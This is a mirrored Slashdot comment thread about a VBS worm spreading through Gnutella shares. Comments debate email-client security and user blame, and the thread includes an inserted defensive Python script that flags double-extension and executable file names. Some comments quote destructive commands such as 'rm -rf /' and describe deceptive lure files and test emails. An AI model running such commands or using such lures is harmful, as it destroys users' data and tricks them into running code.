Slashdot Mirror


Gnutella VBS Worm

TRingstad writes: "ZDNet has an article about a new worm infecting Gnutella users. The worm changes the gnutella.ini file to accept VBS files and places 23 Trojan files in the Gnutella download directory so that others on the network may find them. It then creates a 'victim' file with some statistics on what generation of the worm infected the user and on what date. Finally, it copies a warning, 'If I was a naughty boy, I could use scripting to get name, email, whatever file I want.'"

263 comments

  1. Of course, if you run Gnutella by ericr · · Score: 1

    Under FreeBSD or Linux, *vbs trojans aren't much of an issue...

    Silly Microsoft users, they almost deserve what they get. Why is no one suing the pants off of MS, since they practically sponsor/condone all these virii by intentionally using insecure technology?

    --
    It was Judge Woodlock, in the US District Court for Massachusetts, with a gavel.
  2. The User was RIGHT by Rilke · · Score: 3

    I agree with the user in this situation. I should be able to open any e-mail I receive, and my mail reader sure as hell shouldn't be executing any code in that email without asking me first.

    I receive unsolicited e-mail all the time, and I feel free to open it in mutt, because I know that embedded executables are not going to be run.

    The user in this situation is absolutely correct. They're running under the assumption that just *looking* at an email should never be dangerous. They're assuming not only that nobody would write a mail reader stupid enough to execute code without asking, but that if anybody did happen to write such a stupid program, the tech support department where they work would never allow such a program to be loaded on everybody's machine.

    In a sane world, that would be a good assumption...

    1. Re:The User was RIGHT by Cally · · Score: 2

      Don't be so proud of this technological terror you've created ....

      http://www.securityfocus.com/vdb/bottom.html?vid=664:

      Mutt Text/Enriched Handler Buffer Overflow Vulnerability

      A buffer overflow vulnerability in Mutt's handlers for the text/enriched MIME type allows malicious
      email messages to execute commands as the user running Mutt.

      bugtraq id: 664
      object: mutt (exec)
      class: Boundary Condition Error
      cve: GENERIC-MAP-NOMATCH
      remote: Yes
      local: Yes
      published: September 27, 1999
      updated: April 11, 2000
      vulnerable: Mutt Mutt 0.95.6
      not vulnerable: Mutt Mutt 1.0pre3

      Nothing comparable with Outlook's abominable security model, and of course it could only trash your own files ... but just cos you're on Linux doesn't mean you're 100% safe.
      Camaron de la Isla 'When I sing with pleasure, my

      --
      "None are more hopelessly enslaved than those who falsely believe they are free." -- Goethe
    2. Re:The User was RIGHT by Rilke · · Score: 2
      > However, Gnutella is not an Email program,

      No offence (well, hell, take offense), but did you even read the post I responded to? It was specifically about email, and it was from somebody in tech support telling a user not to even read email from somebody he/she didn't know.

      > Assumptions are exactly the problem. They're assuming that the attachment in the message they receive (or the file that they download in THIS case.) is not harmful, and happily clicking away on it.

      I disagree, I really do. There's nothing wrong with clicking on an attachment, or at least there shouldn't be. If it's harmful, then my mailreader shouldn't run it. It's that simple. I should be able to read text documents or view pictures from my mail reader, there's no good reason to execute code from there. And if I need to do this, make me be explicit about it, by piping the file to a specific command.

      *nix isn't without sin here. Shell archives were a terrible idea, and they've rightly become quite rare. And any *nix mailreader that executed a .shar file merely because I clicked on it would be broken as designed.

      > As far as Tech Support goes, do you think that they should just disallow access to run any programs on a computer at all?

      No, they should disallow the ability to run executable code directly from the mail reader. When somebody says to me "I received an unknown email", I should be able to say "Click on it and see what it is. No harm can come of that." My mailer sure as hell shouldn't execute a file just because it had a .pl extension, especially if the mailer didn't even show me the extensions by default.

    3. Re:The User was RIGHT by tringstad · · Score: 1

      > No offence...

      None Taken, I'm not interested in a flame war, and I apologize if I came across that way.

      > ...but did you even read the post I responded to?

      I did not. Until you pointed it out, and I examined it carefully, I could not see that it was a reply to a post. It took some digging to find the post it was attached to. Sorry.
      On to the meat and potatoes.

      > There's nothing wrong with clicking on an attachment, or at least there shouldn't be. If it's harmful, then my mailreader shouldn't run it. It's that simple.

      I don't think it's that simple. How should your email client decide what is harmful and what is not? Wouldn't that be the job of Anti-Virus software? I agree that it would be nice if it had this capability, but I doubt that any of us would dare say MS Outlook isn't bulky enough already.

      > I should be able to read text documents or view pictures from my mail reader, there's no good reason to execute code from there.

      I strongly disagree with this. Whether or not there is a good reason to execute code (or any other executable attachments) from within your browser depends on your environment, and frankly, I doubt that many of the users that you are defending want to be forced to save an attachment, figure out where they put it and then run it. As a matter of fact it is exactly the desire not to have to do this that has given MS the iron grip it has on consumers. (Blasphemy, I know!)

      > *nix isn't without sin here.

      Indeed, but I'll be the first to say *nix are by far the lesser sinners. But the nixes don't have the ease of use and UI that is required by your average user. (Blasphemy again! Burn him!)

      > When somebody says to me "I received an unknown email", I should be able to say "Click on it and see what it is. No harm can come of that."

      Here I admit I'm a bit confused. I can think of several ways that I can examine a program to see what it is without running it, but not a single way for an average user to do it. And even if they could, "ILOVEYOU" has certainly shown us that they'll run it anyway, "Just to see what it does".

      -Tommy

      --
      "I got a half gallon of Jack, and 2 dozen Ant Traps. I'm about to get wild." -me
    4. Re:The User was RIGHT by Rilke · · Score: 2
      > How should your email client decide what is harmful and what is not? Wouldn't that be the job of Anti-Virus software?

      It's not Harmful the client should know about, it's just Executable, and that's not really all that tough. Sure, it's a tiny bit tougher when we're dealing with script files rather than binaries, but there's absolutely no reason the mail client can't know about these. I can see missing something like .py if somebody has installed python, but c'mon, .vbs? (I haven't used outlook in years, does the program recognize .vbs as executable and run it anyway, or does it appear to outlook to be a document file for the VBScript interpreter?)

      And more importantly, in the corporate environment, there's no excuse for not letting the administrator set these things. I should be able to configure outlook to totally ignore certain types of attachments; if the user is advanced enough to change that setting, fine, but the innocent will be protected.

      > Whether or not there is a good reason to execute code (or any other executable attachments) from within your browser depends on your environment.

      I don't see this, I really don't. Why should users need to execute emailed files? Self-extracting archives? Bad idea. I can agree with you here about the web browser, but not email. I can even agree about home usage, but we're talking about a corporate environment here.

      > But the nixes don't have the ease of use and UI

      Agreed, I'm anything but a unix bigot here. But this thread started with a typical "blame the (L)user" attitude for an error that I strongly feel should be placed on the mail admin and on the software. The employee got an unsolicited resume, reading it should not be a harmful act.

      And that's what really annoyed me about it, I hate this attitude. It's like forcing people to change passwords every 2 weeks "to enhance security", and then complaining because the "stupid users" are writing their passwords down on post-its. Well, of course they are. Who can remember 26 different passwords a year?

      > Here I admit I'm a bit confused. I can think of several ways that I can examine a program to see what it is without running it, but not a single way for an average user to do it.

      They should be able to just click on it. If the mailer doesn't show it then it was harmful and should be deleted. And if you (not *you*, but the administrator) haven't configured your mail clients so that users can safely read their e-mail, (and there's lots of view-only software out there for Word processing files) then don't go complaining about stupid (L)users when something goes wrong.

      > And even if they could, "ILOVEYOU" has certainly shown us that they'll run it anyway, "Just to see what it does".

      Oh, don't get me started on MS Word, I've fought with MS over that for almost a decade now. It would have been so incredibly simple to make Word safe in the corporate environment, and they simply refused to do it. Check out this page for a fun story of dealing with MS.

    5. Re:The User was RIGHT by tringstad · · Score: 2
      > I agree with the user in this situation. I should be able to open any e-mail I receive, and my mail reader sure as hell shouldn't be executing any code in that email without asking me first.

      That makes perfect sense. However, Gnutella is not an Email program, and nothing is being executed without being asked to. Nor is anything being executed without being asked to in the case of ILOVEYOU and MS Outlook, which is what I assume you are talking about.

      > I receive unsolicited e-mail all the time, and I feel free to open it in mutt, because I know that embedded executables are not going to be run.

      That's great too, but the problem isn't with just receiving email. And in the case of ILOVEYOU (if that's what we're talking about) embedded executables weren't being automatically run. I could just as easily send you a program as an attachment in Mutt, and if you ran it and it formatted your drives, it would be no different.

      > The user in this situation is absolutely correct. They're running under the assumption *snip*

      Assumptions are exactly the problem. They're assuming that the attachment in the message they receive (or the file that they download in THIS case.) is not harmful, and happily clicking away on it. As far as Tech Support goes, do you think that they should just disallow access to run any programs on a computer at all? That way nothing bad can happen, eh?

      -Tommy

      --
      "I got a half gallon of Jack, and 2 dozen Ant Traps. I'm about to get wild." -me
  3. The Power of Freedom by extrasolar · · Score: 2

    This is the way I see it. And this isn't only about the Gnutella Worm, it's about viruses in general. In any truly free system (free as in free speech, of course), you can not fully prevent one person from causing harm onto another. You can restrict the system, create more restrictions and secure, but then some freedom is lost. That is because freedom relies upon people who choose not to cause harm onto other people.

    In a specific sense, this guy who created the worm is only exploiting the freedom he was granted. Thus people start locking down and all of us lose a certain amount of freedom.

    There is a very good reason why we dislike people who pull these kinds of stunts. It is because we know that if we invested that kind of time and effort in creating a virus or worm, we could do it. But we don't. Because we want to keep our freedom on the internet. Because we know that no one ever said we couldn't cause harm to other people's systems. Because as long as we have freedom, we *know* we can cause harm. But we don't because we are moral beings.

    The Power of Freedom is directly our ability to influence others and ourselves. If you can't see this---if you only see the internet and other users of the internet as some sort of game, then you do not deserve the little freedom we have left.

    Time for a little maturity (speaking from a 17 year old :)

  4. Problem with this worm... by lpontiac · · Score: 1

    Is it just me, or could this (whatever it is - 'trojan horse' sounds good to me) do what it does just as well if it were compiled code, rather than a VBS? That way, it could also target the users without scripting enabled.

    To whoever wrote this: learn C, or C++, or something better than BASIC. Trust me, it'll do you wonders :)

  5. Re:Not a worm! by Kinthelt · · Score: 1
    Get your definitions right, ZDNet.

    I've been noticing the same things in just about every virus-related news story. My favourite mis-definition was one I saw a few weeks ago: "A worm is a virus that can replicate itself".

    --

    "Evil will always triumph over good, because good is dumb." - Dark Helmet (Spaceballs)

  6. D. All of the above by silicon_synapse · · Score: 1

    Virii/worms/trojans/whatever rarely fit nicely into only one category but rather have traits from two or more families of pestilences. This vbs propagates like a worm yet deceives like a trojan.

  7. Re:Really Clever?? Are you kidding? by jabber · · Score: 1

    Careful now, there have been some infamous online discussions about the origins of AIDS, and HIV's apparent preference for certain subsets of society..

    Ignorance, thankfully, can be cured with education. Stupidity and arrogance on the other hand...

    Besides, getting rid of the 'stupid' would just raise the bar of 'average' higher. :)

    --

    -- What you do today will cost you a day of your life.
  8. Re:Linux enters the mainstream? by saridder · · Score: 1

    MSN's homepage and Hotmail. Both suck unless you have VB turned on.

    --
    --- RFC 1149 Compliant.
  9. Re:Humans weak. Grunt, grunt. by Vicegrip · · Score: 1

    Not to mention the fact that most Windows users run with Administrator (root) privileges.
    Why?
    Because there is no easy way to switch to root to do useful things like install software. Until Microsoft provides their OS with a su like mechanism there will always be a plethora of scripts-viruses-dumbusers trashing a system because the OS simply lets them.
    Users are lazy.. nobody wants to shut everything down just so they can quickly do something as root.
    None of these VBS scripts would ever have been able to do anything other than forward themselves if people ran their systems with proper user privileges.
    I mean, what kind of modern OS gives users the option to "always assume it's them" when they turn the machine on? bleah....
    Windows:- obfuscation of a whole other kind....

    --
    Do not spread "09 F9 11 02 9D 74 E3 5B D8 41 56 C5 63 56 88 C0" over the internet, thank you.
  10. Re:Conspiracy? by pdk · · Score: 1

    Maybe it was AOL trying to stop the proliferation of the client, since they tried to shut it down earlier this year. After all, it goes against the whole AOL/Time Warner record company kinda deal.

    --
    Paul K.
  11. Re:Open Source is Secure by brandond · · Score: 1
    One example does not constitute a proof. Don't believe me? Two is a prime number. Two is also an even number. Does this mean we can assume that all even numbers are prime? Or that all prime numbers are even? Sorry.

    Second, while I agree that OpenBSD is a very secure OS, to state that it is "the most secure" is a stretch. There are other OS's out there which are also considered very secure. IBM's (closed source) OS/390 which runs on the mainframes for many (most?) banks is also very secure. To argue which is "more secure" is futile.

    So, the previous point stands. Open Source != Secure.

    -----

  12. Re:Good viruses? by Whackamole · · Score: 1

    It's a natural law: Users are unfailingly likely to open trojans on themselves regardless of delivery method or quality of disguise. When I helped admin a network, we thought it would be a fun test to send around an email as below. The script would really post a file to some "wall of shame" that we could make available. We felt confident that there would be more than a couple users caught red-handed.

    Title: This will blow your hard drive away
    Double-clicking on the following attachment will delete your HD partition and you will lose all information on C:
    Attach: delete_HD.txt.vbs

    --
    Data East: "Leaders in Dot Matrix Technology" - Star Wars pinball
  13. Re:When will this run on linux by Pflipp · · Score: 1

    > I mean ... with all the VBS files flying around when will somebody port Visual Basic Scripting
    > support to linux. I am sick of having to run Windows just to get a VBS worm. Is somebody
    > working on this already?

    Prepare for a great shock, but a VB clone is indeed being made for Linux. What's worse, the people of Evolution seem to be very interested in it. What's even more queer, it was available on the GNU Task List for ages...

    I never quite understood the reason; they say that GNOME Basic (= the name) is built from the ground up to be secure. But what do you need VB for besides for virus writing anyway?

    OK, maybe for macros, but I don't want crappy VB *applications* in Linux. Having to _download_ 4 Mb to get a program that _uploads_ your IP address sux. Especially when it is also crappy, shareware, and it requires some obscure *vbs.dll libs you don't have. Yuck!

    Besides, we have tons of languages with "macro capacities" already.

    So even though I cannot see WHY, there IS VB for Linux !!!

    It's... It's...

    --
    "We can confirm that Debian does *not* ship the version with the trojan horse. Our version predates it." [CA-2002-28]
  14. And if they run it, then what? by FascDot+Killed+My+Pr · · Score: 1

    Are you going to deride the UI of their OS: "It should highlight viruses in yellow."
    Are you going to lambast the software maker for 'poor security': "It should auto-delete attachments"
    Are you going to install virus detection software: "THAT'S taken care of--until I need to upgrade"

    Or are you going to address the real problem: "Listen you knuckleheads, don't run programs unless you know what they do and who they are from".

    I am very sympathetic to people who don't know how to use computers--I just gave my mom some of her first lessons on "using the Internet" this weekend. I am NOT sympathetic to people who don't listen or think.
    --
    Have Exchange users? Want to run Linux? Can't afford OpenMail?

    --
    Linux MAPI Server!
    http://www.openone.com/software/MailOne/
    (Exchange Migration HOWTO coming soon)
    1. Re:And if they run it, then what? by extrasolar · · Score: 2

      Actually it is a good exercise. It seems that after a while people would learn to be more careful.

    2. Re:And if they run it, then what? by jbarnett · · Score: 3


      I am not turning this into a whole OS security model vs stupid user war.

      If my grandparents get infected with a virus, worm or buggy program, guess who gets to clean up the mess? Me. I am trying to put some basic sense in their heads so I don't have to go over there and restore it.

      If they were running Unix or anything else I would say "Hey when someone says try `rm -rf /` you know they are kidding right?"

      I don't know or really care if it is the fault of the user or the security model of the OS, the only thing I know is that I don't like restoring a computer from OS up when it could be prevented with a few precautions (in this case informing the user)

      Me sending them that program is my way to "test" them, you know those fire drills you had in school? that is what I am trying to do, it is interesting to see users' reactions, but that isn't the point.

      The point is, when they have a fire in their house they will make it out alive, err I mean when there is a virus in their house they, the point was, as I was stating, is so that they know how to use fire to kill any virii that may be infecting their house due to biological warfare started by malicious computer users...

      As with any system (strong security policy or not), you have to inform the users of the strengths and weaknesses of the system. Even if you have an extremely secure system, if you post the username and password to anyone, it becomes as secure as an overweight high school girl going to a dance...

      I am trying to stay away from the "stupid user vs insecure OS" war going on, but I think both sides agree that the user needs to be informed of basic security measures. A Unix system can be secure till Bob posts the root password on irc...

      To test this theory someone please post their root password and ip on slashdot. :)

      (technically if it was behind a firewall and had tcpwrappers installed and telnet/ftp/etc disabled it still could be considered secure)

      --

      "`Ford, you're turning into a penguin. Stop it.'" -THHGTTG
  15. And 17 varieties by blixco · · Score: 1

    with 666 lines of code. Damn.

  16. Re:clearing things up by jbarnett · · Score: 2


    You can get basic to work in Linux. I forgot the name of the program, but IIRC it was on Slackware 3.5. I bet you could port visual basic to Linux, and then set the permissions to 4755 with owner root for the runtime interpreter, that should work.

    I think most people figure it like this

    GNU == Unix
    UNIX == GNU/Linux
    GNU/Linux == Linux
    (GNU *anything* || anything OpenSource) == Linux

    which I am not claiming it is right, but when I first heard GNUtella, I thought it was a Unix program from the Free Software Foundation...

    What does the "tella" stand for anyways?

    --

    "`Ford, you're turning into a penguin. Stop it.'" -THHGTTG
  17. Re:Gnutella is closed source, hence not secure by Old+Wolf · · Score: 1

    Oh rubbish.

    When it happens in MS Outlook Express, it's MS's fault and OE's fault. When it happens in Gnutella it's the operating system's fault. Couldn't see that one coming from you Linux zealots.

    Having executable files is not an OS fault.
    .VBS is no different to .EXE , as far as executability goes. The problem is with dumb users who execute the executable file, or with software that allows an executable file to be automatically executed.

    Note: Executable file does not necessarily mean +x on *nix; as script files handled by a script processor do not need to be +x (eg. perl, python, php, ini, bashrc, etc.)

  18. Re:asm by harmonica · · Score: 2

    Seriously though, if Microsoft wanted to make it more secure, give it user permissions like Unix,

    NT has those permissions. For Win9x to have them, they had to change the file system (FAT) and some other things, breaking their whole we-remake-DOS-once-a-year-and-you-better-buy-it compatibility. So, nothing will change.

  19. Re:my favorite is the html generating scripts by AugstWest · · Score: 2

    sure. it's right here.

  20. Re:untrue by b_pretender · · Score: 2

    You should clarify that.

    Doesn't happen on your *nix box.

    --

  21. Re:Reminds me of this UNIX "virus" I received once by roman_mir · · Score: 2

    Big deal. I conducted an experiment: a user gets a file that says: This is the Unix version of "I Love You" which works on the honor system. If you receive this mail, you should delete a bunch of GIFs, MP3s and binaries from your home directory, then send a copy of this email to everyone you know and then click on the following link: click this in order to increment the count of systems that this virus had spread to. Thank you. ----- The worst thing is that in less than a week over 480 clicks have been recorded!

  22. Re:...but remember, Gnutella isn't actually weak.. by DrTomorrow · · Score: 1
    ...but rather weaknesses in the Windows operating system and more importantly, the user

    What is the weakness of Windows? Windows makes it easy for stupid people to shoot themselves in the foot.

    If Linux was just as popular with stupid users as Windows is, something similar could happen with Perl scripts. If the user runs something dangerous without knowing what it is, the user is to blame, not the OS.

    --

    Everything in this post is false.

  23. Re:...but remember, Gnutella isn't actually weak.. by / · · Score: 2

    People have to be told that "You just don't run stuff from an untrusted source."

    And by "trusted", you have to specify not just "I know this person and he doesn't want to hurt me maliciously" but also "I trust whatever he's running on his system not to hurt me". The recent Outlook worms et al have demonstrated that any idiot running an insecure system can spread all sorts of nasties to his friends and colleagues, who normally trust him.

    --
    "If one is really a superior person, the fact is likely to leak out without too much assistance" -- John Andrew Holmes
  24. Is this really a worm? by glitch_ · · Score: 2

    Can this really be classified as worm, since it has to be downloaded by other users? Also, how does this go about making users download it?

    1. Re:Is this really a worm? by eudas · · Score: 2

      they should call it something new. call it a boobytrap -- that's what it really is anyway. looks to me like it catches lots of them. (the cgi script posted earlier today certainly caught me. what a maroon. *bonk self*)

      eudas

      --
      Blessed is he who expects the worst, for he shall not be disappointed.
    2. Re:Is this really a worm? by Oblio · · Score: 1
      > To quote the article, it is in files marked "Pamela Anderson movie listing.vbs, collegesex.vbs, Battlefield Earth.vbs, Napster Metallica Crack.vbs and NSync.vbs" [...] And think about it... would a good movie be only a few thousand bytes long???

      Are you accusing battlefield earth of being a good movie? :) : )

      --
      Pax -- Ob
    3. Re:Is this really a worm? by Misch · · Score: 5

      > PamelaAndersonMovie.mov, collegesex.zip, MetallicaMP3crack.zip

      To quote the article, it is in files marked "Pamela Anderson movie listing.vbs, collegesex.vbs, Battlefield Earth.vbs, Napster Metallica Crack.vbs and NSync.vbs"

      Because of the way windows works, you may see something like "PamelaAndersonMovie.mov.vbs", much like the ILOVEYOU virus had. But more often, Windows defaults to not showing the extension on .vbs files.

      Gnutella though, will show the .vbs extension before you download. And think about it... would a good movie be only a few thousand bytes long???

      The problem is that the amount of common sense in the universe is a constant, however, the population keeps rising. This particular one can only really hit your system if you download and run it.

      --

      --You will rephrase your request for me to go to hell. Goto statements are not acceptable programming constructs
    4. Re:Is this really a worm? by Biff+Cool · · Score: 1
      Melissa ran automatically but I never heard of ILOVEYOU running without loading the attachment. What feature was that?

      --

      Conscience is the inner voice which warns us that someone may be looking.
      -- H. L. Mencken

    5. Re:Is this really a worm? by AstroJetson · · Score: 2

      I can't answer your first question, but seems like 'worm' is as good a handle as we've got right now. Maybe this calls for a new classification.

      As to the second question, it creates shared files with names like PamelaAndersonMovie.mov, collegesex.zip, MetallicaMP3crack.zip, etc. In other words it gives them attractive sounding names in the hopes that someone will see them and come download them.

      --
      Admit nothing, deny everything and make counter-accusations.
    6. Re:Is this really a worm? by rifter · · Score: 1

      I think here they are aiming for the less intelligent/unwary among users, like usual. It also appears to be working.

    7. Re:Is this really a worm? by glitch_ · · Score: 2

      Again, I spoke before I read. After reading, I still believe that this can't be classified as a worm. With the new spread of e-mail worms/virii/trojans, it seems worm has become a new buzzword. When the media classified everything as viruses, we yelled, saying it is a worm...now, it isn't a worm and they are calling it one. The problem lies in an undereducated media, and an overabundance of people willing to trust them.

    8. Re:Is this really a worm? by Skeezix · · Score: 1

      I wouldn't classify it as a worm any more than I'd classify a script that does "rm -rf ~/*" and is disguised so that surfers don't think it's malicious, so they download it and run it.
      ----

    9. Re:Is this really a worm? by Kvan · · Score: 1

      > Because of the way windows works, you may see something like "PamelaAndersonMovie.mov.vbs", much like the ILOVEYOU virus had. But more often, Windows defaults to not showing the extension on .vbs files.

      This is not entirely true--".mov" is usually also a registered extension (I think it is by default, in fact), so you'd see "PamelaAndersonMovie", with the VBScript icon. I doubt any of the people who have extensions turned off know what the different icons look like, though, so they click it anyway.

      Which makes me wonder: Am I the only one with the distinct sensation that only the clueful users actually know and recognize different types of icons? I mean, they're supposed to make it easier for clueless users to figure out what things are, but in practice it seems that this is exactly the class of users who don't get them.

      --

      "A *person* is smart. People are dumb, panicky, dangerous animals and you know it."
      - 'K' in Men in Black.
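
The checks argued for in this thread, as an added example that is not part of the original comments: decide by the final extension whether a file is executable (Rilke's point about the mail client), and flag the `.mov.vbs` naming and the too-small "movie" raised in the comments by Misch and Kvan. The extension lists, size thresholds and the names `split_exts` and `assess` are assumptions, and the file sizes in the sample are constructed.

```python
from dataclasses import dataclass

# Policy lists are assumptions for this example; an administrator would tune them.
EXECUTABLE_EXTS = {".vbs", ".vbe", ".js", ".jse", ".wsf", ".wsh",
                   ".exe", ".com", ".scr", ".pif", ".bat", ".cmd"}
# Extensions users read as "just data"; placed before an executable one they are a decoy.
DOCUMENT_EXTS = {".txt", ".doc", ".jpg", ".gif", ".zip", ".mp3", ".mov", ".avi", ".mpg"}
# Constructed lower bounds for the media type a name claims to be.
MIN_MEDIA_BYTES = {".mp3": 500_000, ".mov": 1_000_000, ".avi": 1_000_000, ".mpg": 1_000_000}


@dataclass(frozen=True)
class Finding:
    filename: str
    handler_ext: str   # extension that selects the program Windows launches
    reasons: tuple
    action: str        # "block", "warn" or "view"


def split_exts(filename):
    """Return (final_ext, inner_ext), lower-cased, for a Windows file name."""
    base = filename.replace("/", "\\").rsplit("\\", 1)[-1]
    # Windows drops trailing dots and spaces, so "x.vbs. " is still a .vbs file.
    base = base.rstrip(" .").lower()
    stem, dot, last = base.rpartition(".")
    if not dot:
        return "", ""
    _, inner_dot, inner = stem.rpartition(".")
    return "." + last, ("." + inner if inner_dot else "")


def assess(filename, size_bytes):
    """Classify one attachment or shared file by name and size only."""
    final, inner = split_exts(filename)
    reasons = []
    if final in EXECUTABLE_EXTS:
        reasons.append("executable-type")
        if inner in DOCUMENT_EXTS:
            reasons.append("decoy-extension")
    # The type the name claims: the real one if it is media, else the inner one.
    claimed = final if final in MIN_MEDIA_BYTES else inner
    if size_bytes < MIN_MEDIA_BYTES.get(claimed, 0):
        reasons.append("size-implausible")
    if "executable-type" in reasons:
        action = "block"      # never hand the file to the shell on a click
    elif reasons:
        action = "warn"
    else:
        action = "view"
    return Finding(filename, final, tuple(reasons), action)


if __name__ == "__main__":
    # Names taken from the thread plus constructed ones; all sizes are constructed.
    listing = [
        ("Battlefield Earth.vbs", 9_000),
        ("PamelaAndersonMovie.mov.vbs", 7_000),
        ("delete_HD.txt.vbs", 2_000),
        ("REPORT.DOC.VBS. ", 3_000),
        ("trailer.mov", 4_000),
        ("holiday.mov", 40_000_000),
        ("notes v1.2.txt", 900),
    ]
    for name, size in listing:
        f = assess(name, size)
        print(f"{f.action:5} {name!r:32} {', '.join(f.reasons) or '-'}")
```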

    10. Re:Is this really a worm? by Anonymous._.Coward · · Score: 1
      > Anyone who doesn't know not to run a vbscript file deserves to be infected.

      I dunno about this. Seems to me like a lot of people will click/execute/rm -rf *.* if you tell them to. Look at the effect on slashdot that the "This is more informative" link had. Slashdot is supposed to be an informed discussion group but you still happily clicked on a CGI script that took your cookie and posted a comment to /. in your name.

      --

      take a triptonica to subthunk

    11. Re:Is this really a worm? by Biff+Cool · · Score: 1
      AFAIK a worm is a piece of code that doesn't require user interaction to spread (e.g. the internet worm which exploited a buffer overflow to write executable code into memory and trick the computer into running it instead of the next instructions). This requires (just like ILOVEYOU) that someone run the script.

      --

      Conscience is the inner voice which warns us that someone may be looking.
      -- H. L. Mencken

    12. Re:Is this really a worm? by grahamm · · Score: 2

      It sounds more like a Trojan Horse (a tempting 'gift' left outside the city gates) but that term has already been taken.

    13. Re:Is this really a worm? by mikpos · · Score: 2

      You answered your own question. A malicious piece of code disguised as an attractive piece of code is called a trojan.

  25. Re:Really Clever.. Actually... by CptnHarlock · · Score: 1
    Many servers simply house large numbers of files (with appropriate names) that redirect users to the owner's porn site or places a desktop link to said porn site.

    Actually... It's just a couple of servers that are actively monitoring the searches (keywords) and generate the same files with the search keywords as filenames so that less intelligent users download the html and click them.. One of the spammers even adds a space=" " as the first character on the filename so that it gets on top of the list if you are sorting by filename.. Clever and immensely annoying.. I checked one of the spammers' IP# and mailed to the webmaster of the site the spam was redirecting to but I doubt he'll do anything about it.. After all - the spammer is generating traffic..

    Thank you.
    //Frisco
    --
    "At the end of the journey, all men think that their youth was Arcadia..." -Goethe

    --
    $HOME is where the .*shrc is
    -- silver_p
  26. Re:...but remember, Gnutella isn't actually weak.. by DrTomorrow · · Score: 1
    Windows doesn't differentiate between "view" and "execute".

    Should it? When you double-click on a file, Windows tells the registered application to open this file. Windows tells Notepad to open .txt files. Windows tells WScript to open .vbs files. Windows has no idea as to what the application is planning to do with the file (execute or view).

    Maybe the answer is to remove the registered filetype mappings. If you want to open a file, you must open it from within an application. Clicking on a file does nothing.

    As I said, Windows makes it easy for a stupid person to shoot themselves in the foot. It's still mainly a user problem.

    --

    Everything in this post is false.

  27. Good viruses? by Shadowell · · Score: 2

    Is it just me or is this the first one out there that actively warns people about what it can do? Perhaps people will wake up finally.

    1. Re:Good viruses? by slycer · · Score: 1

      People will not wake up. I remember reading somewhere (really don't remember) - maybe it's urban legend - about someone that created a script that would simply pop up a message on the persons screen. He sent it out to the office stating - This is a Virus - DO NOT OPEN IT.

      Apparently (many!) people still opened it.

    2. Re:Good viruses? by Rilke · · Score: 3

      No, the first big MS Word virus, way back in 95 or so, was exactly like this. It caused no damage, it just propagated itself to try to make people aware of the huge security hole in Word. The payload said something like "Now I think I've proved my point".

      MS ignored it of course, and even released a new version of Word about a year later that opened the hole even further. Melissa, et al. followed long after that.

    3. Re:Good viruses? by Anonymous Coward · · Score: 1

      I made a version of the ILOVEYOU virus that I sent to friends. It did not actively propagate itself but, instead, put a bunch of messages in one's drafts folder just to prove how easy it *could've* been to do harm. It also informed them of their stupidity and finally showed them the source code. I think perhaps people should release a non-destructive / teach-you-a-lesson virus. The only problem is, though, in order to make itself propagate, one would have to send it to many people, which can be a destructive act when it brings down mail servers. How's that for a Catch-22?

    4. Re:Good viruses? by darkith · · Score: 1
      The public can't wake up, cause they don't know they're asleep.

      Still need a good compromise between

      • properly written, secure software
      • secure, but unrestrictive (if possible) default settings
      • (l)user education
      • vigilance
      • the occasional ok/cancel box that smacks the user upside the head if they click ok/cancel without reading it

      It'll be interesting how the acceleration in the rate at which information spreads affects crime and mischief in general...

      Oh, and I still think people shouldn't praise open-source to the ends of the earth...it may be better than some/most of the alternatives, but I think it ain't no holy grail.

  28. This is important moderate it up by rifter · · Score: 1

    This post is extremely relevant and should be moderated up. Just because it is a reply to a first post does not mean the first post or the reply are irrelevant. For once, a first post actually contained insightful content and it and the reply should have been moderated likewise.

    The fact that nothing *nix is affected by this was missed by ZD (of course!) Is it gonna be missed by slashdot too because of bad moderation?

  29. Ethical "Attack" by Proteus · · Score: 4
    Well, I'm glad to see that the "hacker's ethic" isn't dead yet.

    This could easily have been a lot worse -- the author could have trashed the systems of victims. However, it is simply a warning created to illustrate a serious security hole. Kudos! This is the ethical side of hacking that was always encouraged by the community as I was learning.

    And spare the "hacker v. cracker" definition wars -- IMO, crackers are malevolent, and the author of this worm is certainly not.

    --
    We may not imagine how our lives could be more frustrating and complex—but Congress can. – Cullen Hightower
    1. Re:Ethical "Attack" by Cally · · Score: 2
      By this standard the ILOVEYOU author must also have been a white-hat -- well, grey-hat anyway -- consider, (a) 'ILOVEYOU' subjectline, without spaces, thus v easy to filter; (b) the fact that it could clearly have been /way/ more destructive.

      [off-topic] Still it doesn't seem to have had much effect on luser's behaviour. I guess we'll just have to wait for the Big One before people start to realise that an office with Microsoft /anywhere/ is a disaster waiting to happen.
      Camaron de la Isla 'When I sing with pleasure, my

      --
      "None are more hopelessly enslaved than those who falsely believe they are free." -- Goethe
  30. blah bla-blah by captainchronic · · Score: 1

    Heh, it was only a matter of time. If only they'd do it for metallica users of napster!

    Blah!

    --
    Punk ain't no religous cult, Punk means thinking for yourself. You aren't hardcore if you spike your hair, when a jock s
  31. Conspiracy? by deefer · · Score: 4
    Is it just me, or are there more & more viruses/trojans crawling out of the woodwork of late?
    Is it an underground effort by the Linux zealots to undermine Windows? Is it a cunning ploy by Micro$lop to get people to buy W2K?
    Or is it the anti-virus vendors drumming up sales?
    Or am I just paranoid, and it's all coincidence?

    --

    Strong data typing is for those with weak minds.

    1. Re:Conspiracy? by deefer · · Score: 2
      Hmm, to each his own.
      Refer to the first line again, AC...
      I rest my case...
      And posting at +2 because I am prepared to be counted by my words... I could get snotty here but... You're not worth it.

      --

      Strong data typing is for those with weak minds.

    2. Re:Conspiracy? by matt_martin · · Score: 1
      Think about it, thousands of "security experts" milked billions from all industry as a whole by pushing Y2K paranoia.

      Well, the big day has come and gone but these people still need to eat. Of course they are going to make every attempt to stay relevant and employed by making a huge scene out of every threatening VBS file they can find. (they probably pay MS to "accidentally" leave some security holes open)

      "I heard there was a dangerous script somewhere on a computer once. Pay me money so you can feel better about it."

      Meanwhile my work computer runs at about 1/3 efficiency because it is busy virus-scanning my text data files. (no,I'm not allowed to change the configuration...to suggest so would probably put me on some list somewhere)

      --
      Lurking in the desert
    3. Re:Conspiracy? by quonsar · · Score: 1

      Think about it, thousands of "security experts" milked billions from all industry as a whole by pushing Y2K paranoia.

      bilk millions to milk billions. Poetic injustice, you know...

      |ducking and grinning|

      ======
      "Rex unto my cleeb, and thou shalt have everlasting blort." - Zorp 3:16

    4. Re:Conspiracy? by MrEd · · Score: 1
